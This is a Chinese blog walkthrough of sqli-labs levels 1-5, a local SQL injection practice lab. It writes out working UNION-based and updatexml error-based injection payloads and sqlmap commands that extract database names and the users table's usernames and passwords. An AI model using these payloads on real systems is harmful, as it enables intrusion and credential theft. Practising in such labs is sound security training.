sqli-labs(1-5)通关讲解

最新推荐文章于 2024-10-02 00:27:17 发布
最新推荐文章于 2024-10-02 00:27:17 发布
阅读量495 收藏 10
点赞数 6
分类专栏: sqli-labs靶场全系列通关教程 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53736204/article/details/140617896
版权

sqli-labs(1-5)通关讲解

Less-1

方法一:手工注入

1.判断闭合

http://localhost/sqli-labs/Less-1/?id=1' and 1=1 --+  //正常
http://localhost/sqli-labs/Less-1/?id=1' and 1=2 --+  //异常

image-20240722183932144

image-20240722183913207

2.判断字段数

http://localhost/sqli-labs/Less-1/?id=1' order by 3 --+  //正常
http://localhost/sqli-labs/Less-1/?id=1' order by 4 --+  //异常

image-20240722184041492

image-20240722184049926

有四个字段

3.查看回显点

http://localhost/sqli-labs/Less-1/?id=-1' union select 1,2,3 --+

image-20240722184355116

4.查看数据库

http://localhost/sqli-labs/Less-1/?id=-1' union select 1,database(),3 --+

image-20240722184425097

5.查看表

http://localhost/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="security"),3 --+

image-20240722184631662

6.查看users表中列

http://localhost/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"),3 --+

image-20240722184714357

7.查看users表中username,password的数据

http://localhost/sqli-labs/Less-1/?id=-1' union select 1,(select group_concat(username,0x7e,password) from users),3 --+

image-20240722184830799

方法二:工具注入

1.通过sqlmap工具查看库

python3 sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --batch --dbs

image-20240722185035824

查看当前数据库

python3 sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --batch --current-db

image-20240722185730139

2.查看security中的表

python3 sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --batch --tables -D security

image-20240722185522162

3.查看users数据

python3 sqlmap.py -u "http://localhost/sqli-labs/Less-1/?id=1" --batch --dump -D security -T users

image-20240722185444838

Less-2

第二关为数字型注入,与第一关做法相同

方法一:手工注入

1.判断闭合

http://localhost/sqli-labs/Less-2/?id=1 and 1=1 --+  //正常
http://localhost/sqli-labs/Less-2/?id=1 and 1=2 --+  //异常

image-20240722190020312

image-20240722190027603

其余步骤与Less-1步骤一样,这里不做重复说明了

方法二:工具注入

与Less-1方法相同

python3 sqlmap.py -u "http://localhost/sqli-labs/Less-2/?id=1" --batch --dump -D security -T users

image-20240722190300358

Less-3

方法一:手工注入

1.判断闭合

http://localhost/sqli-labs/Less-3/?id=1') and 1=1 --+  //正常
http://localhost/sqli-labs/Less-3/?id=1') and 1=2 --+  //异常

image-20240722190615717

image-20240722190623179

2.判断字段数

http://localhost/sqli-labs/Less-3/?id=1') order by 3 --+
http://localhost/sqli-labs/Less-3/?id=1') order by 4 --+

image-20240722190740763

image-20240722190748874

3.查看回显点

http://localhost/sqli-labs/Less-3/?id=-1') union select 1,2,3 --+

image-20240722190814793

4.查看数据库

http://localhost/sqli-labs/Less-3/?id=-1') union select 1,database(),3 --+

image-20240722190838860

5.查看表

http://localhost/sqli-labs/Less-3/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

image-20240722191003222

6.查看users表中字段

http://localhost/sqli-labs/Less-3/?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name="users" --+

image-20240722191108305

7.查看users表中数据

http://localhost/sqli-labs/Less-3/?id=-1') union select 1,group_concat(username,0x7e,password),3 from users --+

image-20240722191208699

方法二:工具注入

python3 sqlmap.py -u "http://localhost/sqli-labs/Less-3/?id=1" --batch -D security -T users --dump

image-20240722191407644

Less-4

方法一:手工注入

http://localhost/sqli-labs/Less-4/?id=1") and 1=1 --+  //正常
http://localhost/sqli-labs/Less-4/?id=1") and 1=2 --+  //异常

image-20240722191556487

image-20240722191603817

后面跟前三关步骤一样,参考Less-1和Less-2即可

方法二:工具注入

python3 sqlmap.py -u "http://localhost/sqli-labs/Less-4/?id=1" --batch -D security -T users --dump

image-20240722191758791

Less-5

方法一:手工注入

1.判断闭合

http://localhost/sqli-labs/Less-5/?id=1' and 1=1 --+  //正常
http://localhost/sqli-labs/Less-5/?id=1' and 1=2 --+  //异常

image-20240722191949991

image-20240722191959325

2.判断字段数

http://localhost/sqli-labs/Less-5/?id=1' order by 4 --+ //异常
http://localhost/sqli-labs/Less-5/?id=1' order by 3 --+ //正常

可判断3字段

3.判断回显点

image-20240722192143242

因为没有回显点我们可试一下报错注入

4.报错注入–查数据库

http://localhost/sqli-labs/Less-5/?id=-1' and updatexml(1,concat(0x7e,database()),3)--+

image-20240722192356943

5.查表

http://localhost/sqli-labs/Less-5/?id=-1' and updatexml(1,concat(0x7e,((select group_concat(table_name) from information_schema.tables where table_schema="security") )),3)--+

image-20240722192513574

6.查users中的列名

http://localhost/sqli-labs/Less-5/?id=-1' and updatexml(1,concat(0x7e,((select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users") )),3)--+

image-20240722192602212

7.查users中username,password中数据

http://localhost/sqli-labs/Less-5/?id=-1' and updatexml(1,concat(0x7e,((select group_concat(username,0x7e,password) from users) )),3)--+

image-20240722192708912

可通过限制查询–limit 来逐一查看每组数据

方法二:工具注入

通过sqlmap可直接查出users表中数据至于具体操作可参照Less-1

python3 sqlmap.py -u "http://localhost/sqli-labs/Less-5/?id=1" --batch -D security -T users --dump

image-20240722192936349

ps:后续教程会持续发布,尽情期待

黑白时光les
关注
专栏目录
详细sqli-labs(1-65)通关讲解
dreamthe的博客
05-17 15万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
详细sqli-labs(1-20)通关讲解
m0_57928318的博客
05-18 2520
获取数据库名时可以使用 left() 函数,这里使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。我们可以看出,GET 方式和post 方式 的区别,GET方式 可以明显的 从 URL 中进行注入,POST可以在数据包中进行修改对应的字段来进行 SQL 注入。获取数据库名时,使用 LEFT() 函数进行穷举法的效率较低,使用 substr() 函数结合 ASCII() 函数进行判断可以使用二分法快速缩小范围。
Sqli-labs-master超详细通关教程(1-23关|基础篇)
weixin_51143375的博客
11-02 2万+
一到四关主要是参数被包装的问题。一般用于尝试的语句 Ps:--+可以用#替换,url 提交过程中 Url 编码后的#为%23 and1=2--+ 'and1=2--+ "and1=2--+ )and1=2--+ ')and1=2--+ ")and1=2--+ "))and1=2--+ 图中显示的sql语句是我为了方便理解,修改了源代码显示出的 第一关: 页面正常,考虑是否有字符注入,先加单引号 可以看到提示,存在' '包装,我们加上--+ http://127.0.0.
sqli-labs-master靶场[超详细通关教程,通关攻略~!]
muyuchen110的博客
07-22 1897
sqli-labs-master[超详细通关教程,通关攻略~!](附解题思路及各注入方法解析)-------持续更新关卡通关教程!!!!
sqli-labs靶场手注通关讲解(1~10)
m0_75030189的博客
03-27 1147
本文章主要用于对sql注入刚入门的教学,sqli-lab靶场可以很好的对各种sql注入方法进行练习!
sqli-labs 第七关 多命通关攻略
两个月亮
01-05 1750
错误输入与不正常输入的返回结果是相同的。该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。怎么会这样?等等,我们刚刚得出的结论好像被忽略了:该页面的 PHP 代码存在这么一个判断语句,在 SQL 查询结果不为空集时,返回结果为;反之返回。既然返回结果为空都将返回,那我们刚刚构造的判断语句又怎么能够判断出注入类型呢?在遇到读写权限问题后,尝试向搜索引擎寻求帮助,但解决方案大多针对 Linux 操作系统且并不详细,只好自己摸索了。
sqli-labs(11-15)关通关讲解
weixin_53736204的博客
07-28 414
此关以POST传入,使用报错注入。
sqli-labs通关详解
m0_52051132的博客
10-15 7045
sqlmap.py -r ./xx.txt --batch --level 3 --tamper=“base64encode.py” --current-db 爆破表单。sqlmap.py -u ip --data=“uname=admin&passwd=admin” --batch -D security --tables 最后脱库。条件正确有回显,条件错误没有回显,布尔盲注?py -r 文件位置 -p 扫描位置 --batch -D security -T users --dump //脱库。
sqli-labs通关汇总-page1
m0_37638874的博客
05-31 1131
前言: 刚辞去变压器方面的工作,准备回归老本行,干渗透测试了。 本文章意在学习SQL注入并结合源代码学习PHP。 借助的是sqli-labs靶场,此靶场是搭在本地的,原因不想在虚拟机里下常用的软件了,如何搭建大家自己搜吧,这里不赘述了。 我们已关卡的方式,边过关边学习 我个人认为这篇文章适合初学走细节的人看 less-1 我们直接贴一下第一关的php源码 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w
sqli-labs 1-65 详细分析
qq_43009954的博客
09-04 1826
这是sqli-labs靶场的通关讲解,希望能帮到你
sqli-labs注入——sqli-labs的1-65关闯关指南
qq_51366383的博客
01-27 1709
sqli-labs图片上一共有75关,但是下载的资料都只有65关,所以只写了65关,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
点评项目-2-完善注册登录业务
m0_75138009的博客
09-29 557
需要处理的业务:在网页发送 /user/code 路径下的 post 请求后,我们需要检验手机号后,向合法的手机号发送一个随机生成的电话号。
World of Warcraft [CLASSIC][80][Grandel] Call to Arms: Victory in Wintergrasp
最新发布
qq 117791303
10-02 269
Wintergrasp 冬拥湖 120 VS 120
Spring的热部署工具和数据库密码加盐操作
2301_77053417的博客
09-28 755
加密过程:用户输入的密码+盐值 --> 字符串1,然后使用md5对字符串1加密得到字符串2,然后字符串2+盐值 --> 字符串3,这个字符串3就是存储在数据库中的密文。背景:如果我们的密码明文存储在数据库中,要是被窃取了是非常的危险的,所以我们在数据库中存储的密码不能是明文的,需要进行加密后存储,也就是数据库中存储的是密文。解密过程:取出数据库中的盐值和用户输入的密码得到字符串1,使用md5对字符串1加密得到字符串2,然后验证字符串2和数据库中的密文即可。做好以上的步骤,你项目中的热部署就已经做好了。
Redis事务
zhzjn的博客
09-30 349
Redis事务可以通过MULTI、EXEC、WATCH和DISCARD指令来实现。1. MULTI指令:表示事务的开始,之后的所有指令都会被逐一记录,但不会立即执行。2. EXEC指令:表示事务的执行,会按照记录的指令逐一执行。3. WATCH指令:可以监视一个或多个键的变化,如果在事务执行期间被其他客户端修改,事务会被回滚。4. DISCARD指令:表示事务的撤销,可以放弃之前记录的指令。
【RocketMQ】RocketMQ应用难点
记录一名在读研究生的学习笔记、感悟、开发产物
09-30 868
本文探讨了RocketMQ中消息重复消费的问题及其解决方案,尤其是在CLUSTERING模式下的扩容影响。文章分析了重复消费的原因,如广播模式、负载均衡模式下的多consumerGroup消费、消费者组内的动态变化及网络延迟等,并提出了利用唯一标识进行去重的方法。此外,还讨论了如何选择合适的存储机制以高效处理大量消息标识,如HashMap、MySQL、Redis以及推荐的布隆过滤器等方案。对于防止消息堆积与确保消息不丢失,也给出了相应的策略和技术措施。
sqli-labs通关1-5
09-03
sqli-labs通关5关:通关5关的方法没有在提供的引用中找到相关信息。 请注意,为了安全起见,在进行实际操作时,请确保仅在合法和授权的环境中进行,并遵守法律和道德规范。<span class="em">1</span><span class=...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值